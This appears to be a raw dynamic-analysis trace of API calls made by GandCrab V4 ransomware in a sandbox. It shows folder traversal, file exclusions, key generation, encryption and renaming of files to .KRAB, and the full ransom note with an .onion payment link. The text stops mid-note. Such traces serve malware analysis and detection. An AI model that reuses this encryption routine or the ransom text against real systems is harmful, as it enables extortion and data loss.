lstrlenW (lpString=".bmp") returned 4 [0086.345] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.346] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0086.346] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.346] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp") returned 48 [0086.346] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp") returned 48 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="desktop.ini") returned 1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="autorun.inf") returned 1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="ntuser.dat") returned -1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="iconcache.db") returned 1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="bootsect.bak") returned 1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="boot.ini") returned 1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="ntuser.dat.log") returned -1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="thumbs.db") returned -1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0086.346] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.347] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.347] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="ntldr") returned -1 [0086.347] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="NTDETECT.COM") returned -1 [0086.347] lstrcmpiW (lpString1="Jfdn8ba607I53g.bmp", lpString2="Bootfont.bin") returned 1 [0086.347] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.347] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0086.348] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.349] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.349] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.349] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.349] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.349] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.350] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010e80) returned 1 [0086.351] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.351] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.352] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.352] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.352] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0086.352] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.352] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0086.354] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.354] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.354] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.354] GetLastError () returned 0x0 [0086.354] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.354] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.354] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010e80) returned 1 [0086.356] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023238) returned 1 [0086.356] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.356] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.356] GetLastError () returned 0x0 [0086.356] CryptDestroyKey (hKey=0x1023238) returned 1 [0086.356] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0086.356] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\jfdn8ba607i53g.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.357] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.357] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.357] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x5f65, lpOverlapped=0x0) returned 1 [0086.371] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffa09b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.371] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5f65, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x5f65, lpOverlapped=0x0) returned 1 [0086.371] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.371] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.376] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.376] CloseHandle (hObject=0x434) returned 1 [0086.376] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.376] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\jfdn8ba607i53g.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\jfdn8ba607i53g.bmp.krab")) returned 1 [0086.377] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.377] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.377] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0086.377] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0086.378] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\KRAB-DECRYPT.txt" [0086.378] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.378] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\KRAB-DECRYPT.txt.KRAB") returned 51 [0086.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\KRAB-DECRYPT.txt") returned 46 [0086.378] lstrlenW (lpString=".txt") returned 4 [0086.378] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.378] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0086.378] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.379] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\KRAB-DECRYPT.txt") returned 46 [0086.379] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\KRAB-DECRYPT.txt") returned 46 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0086.379] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0086.379] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.379] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.379] lstrcmpW (lpString1="Lf9t", lpString2=".") returned 1 [0086.380] lstrcmpW (lpString1="Lf9t", lpString2="..") returned 1 [0086.380] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="Lf9t" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t" [0086.380] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\" [0086.380] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0086.380] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.380] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.380] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.380] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.380] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.380] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.381] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\\\KRAB-DECRYPT.txt") returned 52 [0086.381] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.381] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0086.381] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0086.382] CloseHandle (hObject=0x434) returned 1 [0086.382] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.383] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.383] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0x245)) [0086.383] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.383] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.383] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.384] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\d2ca4a08d2ca4dee3d.lock") returned 58 [0086.384] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0086.384] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.384] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\") returned 35 [0086.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\*" [0086.385] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0x1023238 [0086.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.385] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0086.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.385] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0086.385] lstrcmpW (lpString1="1wZMWI44bo", lpString2=".") returned 1 [0086.385] lstrcmpW (lpString1="1wZMWI44bo", lpString2="..") returned 1 [0086.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="1wZMWI44bo" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo" [0086.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\" [0086.385] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0086.385] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.386] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.386] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.386] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\\\KRAB-DECRYPT.txt") returned 63 [0086.386] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0086.387] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/J